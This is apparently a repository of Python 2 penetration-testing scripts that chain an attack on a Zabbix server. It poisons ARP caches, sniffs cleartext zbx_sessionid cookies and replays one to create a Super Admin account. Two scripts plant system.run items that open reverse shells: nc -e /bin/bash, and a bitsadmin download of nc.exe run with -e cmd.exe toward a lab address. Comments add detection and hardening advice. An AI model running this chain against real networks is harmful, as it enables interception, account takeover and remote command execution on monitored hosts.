├── README.md
├── arp_cache_poison_scapy.py
├── zabbix_bitsadmin_nc_download.py
├── zabbix_host_scan_by_pyzabbix.py
├── zabbix_shell_create_on_Linux.py
├── zabbix_user_create_by_zbxsessionid.py
├── zabbix_version_detect.py
└── zabbix_zbxsessionid_sniffer.py


/README.md:
--------------------------------------------------------------------------------
# zabbix_test
## these are some scripts for testing a Zabbix server

* zabbix_version_detect.py - detect the version of a Zabbix server

* zabbix_zbxsessionid_sniffer.py - catch zbx_sessionid after ARP cache poisoning

* zabbix_user_create_by_zbxsessionid.py - create a user with the caught zbx_sessionid

* zabbix_host_scan_by_pyzabbix.py - scan hosts with the created Zabbix user

* zabbix_shell_create_on_Linux.py - create a shell by using system.run and the new user creds

* zabbix_bitsadmin_nc_download.py - download nc to a Windows PC (for creating and running a tunnel)

* arp_cache_poison_scapy.py - an implementation of ARP cache poisoning for pentests

--------------------------------------------------------------------------------
/arp_cache_poison_scapy.py:
--------------------------------------------------------------------------------

# ARP cache poisoning man-in-the-middle helper (Python 2: uses raw_input).
# Prompts for an interface, a victim IP and a router IP, then loops: send
# forged ARP replies to both hosts, wait one second, capture 10 packets.
# Ctrl-C runs Restore() and switches IPv4 forwarding back off.
#
# Defender view: on the wire this is a stream of unsolicited ARP replies that
# change an existing IP-to-MAC binding. Dynamic ARP Inspection backed by DHCP
# snooping on the switch, static ARP entries for gateways, and ARP-change
# monitoring (for example arpwatch) are the usual controls.
# NOTE(review): argparse is imported but never used in this file.
import argparse
import os
import sys
from scapy.all import *

# All three values are read interactively at import time and used as globals.
interface = raw_input("interface: \n")
victimIP = raw_input("victim: \n")
routerIP=raw_input("router: \n")

def MACsnag(IP):
    """Return the Ethernet source address of the first answer to arping(IP).

    The loop returns on its first iteration; when nothing answers, the
    function falls through and returns None implicitly.
    """
    ans, unans = arping(IP)
    for s, r in ans:
        return r[Ether].src
# ip="192.168.56.101"

def Spoof(routerIP, victimIP):
    """Send one forged ARP reply (op=2) to the victim and one to the router.

    The first packet tells the victim that routerIP belongs to the sender,
    the second tells the router that victimIP belongs to the sender. hwsrc is
    not set here, so scapy's default applies.
    NOTE(review): presumably that default is the sending interface's MAC;
    confirm against the scapy version in use.
    """
    victimMAC = MACsnag(victimIP)
    routerMAC = MACsnag(routerIP)
    send(ARP(op =2, pdst = victimIP, psrc = routerIP, hwdst = victimMAC))
    send(ARP(op = 2, pdst = routerIP, psrc = victimIP, hwdst = routerMAC))

def Restore(routerIP, victimIP):
    """Broadcast ARP replies that carry the MACs resolved by MACsnag.

    Each reply is sent four times to ff:ff:ff:ff:ff:ff with hwsrc set to the
    resolved address of the host it describes, which puts the real bindings
    back into the caches.
    """
    victimMAC = MACsnag(victimIP)
    routerMAC = MACsnag(routerIP)
    send(ARP(op = 2, pdst = routerIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc= victimMAC), count = 4)
    send(ARP(op = 2, pdst = victimIP, psrc = routerIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = routerMAC), count = 4)

def sniffer():
    """Capture 10 packets on the global `interface`, print them, save a pcap.

    Every packet is printed through the sprintf template (source IP and MAC,
    raw payload, destination IP) and the batch is written to temp.pcap.
    NOTE(review): temp.pcap holds raw payloads from the intercepted traffic,
    so it should be handled as sensitive data; it is written on every call.
    """
    pkts = sniff(iface = interface, count = 10, prn=lambda x:x.sprintf(" Source: %IP.src% : %Ether.src%, \n %Raw.load% \n\n Reciever: %IP.dst% \n +=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+\n"))
    wrpcap("temp.pcap", pkts)

def MiddleMan():
    """Enable IPv4 forwarding, then spoof and sniff in a loop until Ctrl-C.

    On KeyboardInterrupt the ARP bindings are restored, forwarding is turned
    off again and the process exits with status 1.
    """
    # Kernel forwarding keeps the intercepted traffic flowing to its real
    # destination. For defenders, ip_forward flipping to 1 on a workstation
    # is an observable side effect worth alerting on.
    os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
    while 1:
        try:
            Spoof(routerIP, victimIP)
            time.sleep(1)
            sniffer()
        except KeyboardInterrupt:
            Restore(routerIP, victimIP)
            os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
            sys.exit(1)


if __name__ == "__main__":
    MiddleMan()

--------------------------------------------------------------------------------
/zabbix_bitsadmin_nc_download.py:
--------------------------------------------------------------------------------
# Creates a Zabbix item with a system.run[...] key on a named host, using
# pyzabbix and credentials typed at the prompt (Python 2: raw_input).
# The command in the key fetches nc.exe with bitsadmin and then starts it with
# `-e cmd.exe` toward a hard-coded lab address, which gives a remote command
# shell from the monitored Windows host.
#
# Defender view: the agent only runs this if remote commands are accepted
# (EnableRemoteCommands=1 on older agents, an AllowKey=system.run[*] rule on
# newer ones), so keep that disabled or denied. Useful signals are item.create
# events with a system.run key in the Zabbix audit log, and bitsadmin.exe
# /transfer or nc.exe under C:\Users\Public started by the agent service.
from pyzabbix import ZabbixAPI, ZabbixAPIException
import sys


api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n")
user= raw_input("enter username: \n")
password= raw_input("enter password: \n")
host_name=raw_input("enter hostname: \n")
# hostid=raw_input("enter hostid: \n")

zapi = ZabbixAPI(api_address) # user='Admin', password='zabbix')

# Login to the Zabbix API
zapi.login(user, password)

# host_name = 'Zabbix_server'

# host_name = "windows host"

# Look the host up by its technical name and ask for its interface ids, which
# item.create needs below.
hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"])
if hosts:
    # Only the first match is used.
    host_id = hosts[0]["hostid"]
    print("Found host id {0}".format(host_id))

    try:
        # NOTE(review): in the Zabbix API type=0 is a Zabbix agent check and
        # value_type=4 is text; delay is the update interval. Confirm against
        # the API version of the server.
        item = zapi.item.create(
            hostid=host_id,
            name='netcat_create_reverse_shell',
            key_='system.run["bitsadmin.exe /transfer /download http://192.168.56.100/nc.exe C:\\Users\\Public\\nc.exe && C:\Users\\Public\\nc.exe 192.168.56.100 5555 -e cmd.exe"]',
            type=0,
            value_type=4,
            interfaceid=hosts[0]["interfaces"][0]["interfaceid"],
            delay=30
        )
    except ZabbixAPIException as e:
        # API errors are printed and the script stops without a traceback.
        print(e)
        sys.exit()
    print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name))
else:
    print("No hosts found")

--------------------------------------------------------------------------------
/zabbix_host_scan_by_pyzabbix.py:
--------------------------------------------------------------------------------
# Logs in to the Zabbix API with credentials typed at the prompt and prints
# the name and id of every host returned by host.get (Python 2: raw_input).
# Defender view: a full host.get from a freshly created account is an
# inventory dump; restrict API access by network and review the audit log for
# logins from unexpected sources.
# NOTE(review): ast is imported but never used in this file.
import ast
from pyzabbix import ZabbixAPI

api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n")
#zbx_sessionid= raw_input("enter zbx_sessionid: \n")
user= raw_input("enter username: \n")
password= raw_input("enter password: \n")

zapi = ZabbixAPI(api_address)
zapi.login(user, password)
print("Connected to Zabbix API Version %s" % zapi.api_version())

# output="extend" asks for every host property; only two are printed.
for h in zapi.host.get(output="extend"):
    hostid=h['hostid']
    host=h['host']
    print ("found host: ",host,"hostid: ",hostid)

--------------------------------------------------------------------------------
/zabbix_shell_create_on_Linux.py:
--------------------------------------------------------------------------------
# Linux counterpart of zabbix_bitsadmin_nc_download.py: creates a Zabbix item
# whose system.run[...] key starts nc with `-e /bin/bash` toward a hard-coded
# lab address (Python 2: raw_input).
#
# Defender view: the same controls apply. Keep remote commands disabled or
# denied on the agent (EnableRemoteCommands / AllowKey / DenyKey), alert on
# item.create with a system.run key, and watch for shells or nc spawned by
# the zabbix agent process.
from pyzabbix import ZabbixAPI, ZabbixAPIException
import sys

api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n")
user= raw_input("enter username: \n")
password= raw_input("enter password: \n")
hostname=raw_input("enter hostname: \n")
# hostid=raw_input("enter hostid: \n")

zapi = ZabbixAPI(api_address)

# Login to the Zabbix API
zapi.login(user, password)

host_name = hostname
# Look the host up by its technical name and ask for its interface ids.
hosts = zapi.host.get(filter={"host": host_name}, selectInterfaces=["interfaceid"])
if hosts:
    # Only the first match is used.
    host_id = hosts[0]["hostid"]
    print("Found host id {0}".format(host_id))

    try:
        # NOTE(review): in the Zabbix API type=0 is a Zabbix agent check and
        # value_type=4 is text; delay is the update interval. Confirm against
        # the API version of the server.
        item = zapi.item.create(
            hostid=host_id,
            name='netcat_create_reverse_shell',
            key_='system.run["nc 192.168.56.100 4444 -e /bin/bash"]',
            type=0,
            value_type=4,
            interfaceid=hosts[0]["interfaces"][0]["interfaceid"],
            delay=5
        )
    except ZabbixAPIException as e:
        # API errors are printed and the script stops without a traceback.
        print(e)
        sys.exit()
    print("Added item with itemid {0} to host: {1}".format(item["itemids"][0], host_name))
else:
    print("No hosts found")

--------------------------------------------------------------------------------
/zabbix_user_create_by_zbxsessionid.py:
--------------------------------------------------------------------------------
# Replays a captured zbx_sessionid as the JSON-RPC "auth" value to call
# user.create, then logs in with the new account through pyzabbix to check
# that it works (Python 2: raw_input).
# NOTE(review): "type": "3" is the Super Admin user type in the Zabbix API
# generation that uses "alias"/"passwd", and usrgrpid "7" is presumably the
# default "Zabbix administrators" group; confirm both for the server version.
#
# Defender view: the session id is a bearer token, so anyone who can read it
# can act as that user. Serve the frontend over HTTPS only, keep session
# lifetimes short, and alert on user.create events and on new Super Admin
# accounts in the audit log.
import json
import requests
from pyzabbix import ZabbixAPI


#api_address="http://192.168.56.102/zabbix/api_jsonrpc.php"
api_address=raw_input("enter correct URL to api_jsonrpc.php, like http://192.168.56.102/zabbix/api_jsonrpc.php"": \n")
zbx_sessionid= raw_input("enter zbx_sessionid: \n")
user= raw_input("enter username: \n")
password= raw_input("enter password: \n")

url = api_address
headers = {'Content-type': 'application/json'}
# The request authenticates with the captured session id, not with a login.
data = {"jsonrpc": "2.0", "method": "user.create", "params": {
    "alias": user, "passwd": password, "type": "3", "usrgrps": [
        {"usrgrpid": "7"}], },
    "auth": zbx_sessionid,
    "id": 1
    }
answer = requests.post(url, data=json.dumps(data), headers=headers)
print(answer)
response = answer.json()
print(response)
print ("testing user parameters:")
# A successful login here shows that the account was really created.
zapi = ZabbixAPI(api_address)
zapi.login(user, password)
print("Connected to Zabbix API Version %s" % zapi.api_version())
# data = {"jsonrpc": "2.0", "method": "user.login", "params": {
# "user": user, "passwd": password },
# "auth": None,
# "id": 1
# }
# answer = requests.post(url, data=json.dumps(data), headers=headers)
# print(answer)
# response = answer.json()
# print(response)

--------------------------------------------------------------------------------
/zabbix_version_detect.py:
--------------------------------------------------------------------------------
"""
This script is for testing zabbix version
by version of the docs on the logon page
"""

# Python 2 only (urllib2, print statement). The target URL is hard-coded.
# Defender view: the login page links to version-specific documentation, so
# the version is visible to anyone who can load the page; limit who can reach
# the frontend and keep the server patched.
import urllib2
import re
from bs4 import BeautifulSoup

zab_page='http://192.168.56.102/zabbix/index.php'
page=urllib2.urlopen(zab_page)
soup = BeautifulSoup(page, 'html.parser')
# Keep the href of the last anchor whose link contains "documentation".
for link in soup.findAll('a', attrs={'href': re.compile("documentation")}):
    version=link.get('href')

# NOTE(review): indentation is lost in this listing; the lines below are shown
# at top level, which is a reconstruction. Confirm against the repository.
parts=re.split('/', version)

# The fifth path component of the documentation URL is taken as the version.
a=''.join (parts[4:5])
print "zabbix version is",a

--------------------------------------------------------------------------------
/zabbix_zbxsessionid_sniffer.py:
--------------------------------------------------------------------------------
# Reads IPv4 frames from a raw packet socket and looks for a zbx_sessionid in
# cleartext HTTP headers; every value found is appended to zbx_sessionids.txt
# (Python 2: print statement, str payloads).
#
# Defender view: this only yields anything when the Zabbix frontend is served
# over plain HTTP and the traffic passes the sniffing host. HTTPS with the
# session cookie marked Secure removes the cleartext token.
# NOTE(review): zbx_sessionids.txt stores live session tokens in cleartext in
# the working directory.
import socket
import re

# PF_PACKET raw socket bound to EtherType 0x0800 (IPv4).
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, socket.ntohs(0x0800))

print ("trying to catch zbx_sessionid")
k = ''
# NOTE(review): indentation is lost in this listing; the nesting below is
# reconstructed. Both else branches are no-ops, so how they pair with the
# if statements does not change behavior.
while True:
    data = s.recvfrom(65565)
    try:
        # s,m,k=''
        # NOTE(review): offset 54 presumably skips 14 bytes of Ethernet, 20 of
        # IP and 20 of TCP headers without options; confirm.
        if "HTTP" in data[0][54:]:
            # print "[","="*30,']'
            raw = data[0][54:]
            # Only the header block before the first blank line is searched.
            if "\r\n\r\n" in raw:
                line = raw.split('\r\n\r\n')[0]
                print "[*] Header Captured "
                # print line[line.find('HTTP'):]
                value = line

                m = re.search("(zbx_sessionid.*)", value)
                if m:
                    # This is reached.
                    # print("search:", m.group(0))
                    # NOTE(review): `str` shadows the builtin from here on.
                    str = m.group(0)
                    # Split on non-word characters; element 1 is the token
                    # that follows the cookie name.
                    k = re.split(r'\W+', str)
                    print ("session_id is :")

                    print (k[1])
                    #### Save the captured zbx_sessionid to a file
                    # print (date)
                    saved_zbxssids = open('zbx_sessionids.txt','a')
                    saved_zbxssids.write('\n')
                    # date = str(datetime.now())
                    saved_zbxssids.write(k[1]) # or with date: saved_zbxssids.write(k[1]+ ' ' + date)
                    saved_zbxssids.write('\n')
                    # saved_zbxssids.write(date)
                    saved_zbxssids.close()
                    print ("zabbix session id saved in file zbx_sessionids.txt")

                    # m = ''
            else:
                pass
                # print raw
        else:
            # print '[{}]'.format(data)
            pass
    except KeyboardInterrupt:
        s.close()

--------------------------------------------------------------------------------